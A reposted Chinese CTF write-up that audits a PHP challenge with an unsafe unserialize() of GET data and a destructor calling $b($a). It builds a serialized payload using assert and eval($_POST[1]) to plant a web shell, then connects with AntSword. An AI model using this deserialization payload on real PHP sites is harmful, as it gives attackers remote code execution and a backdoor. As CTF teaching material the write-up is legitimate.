打開源代碼發現了個./time.php?source
于是打開點進去
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
審計代碼:
發現在__destruct()方法里面有 echo $b($a);
這個是php的特性,php可以通過這種方法動態呼叫方法,
思路很簡單,只要把$b賦值為方法名字,吧$a賦值成呼叫的引數就行了,
我首先考慮的是system結果發現system好像被過濾了,于是自己搭了環境
<?php
highlight_file(__FILE__);
class HelloPhp
{
public $a = 'eval($_POST[1])';
public $b = "assert";
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
// system('dir');
// $b = new HelloPhp;
$c = urlencode(serialize(new HelloPhp));
echo($c);
//O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A15%3A%22eval%28%24_POST%5B1%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D
?>
上述代碼可以為自己創建一個后門,
payload:
發現成功了,于是可以用蟻劍連接,但是這個題目用蟻劍連接以后是空白一片,于是考慮可能是在phpinfo()里面
轉載請註明出處,本文鏈接:https://www.uj5u.com/houduan/497701.html
標籤:PHP
上一篇:java網路編程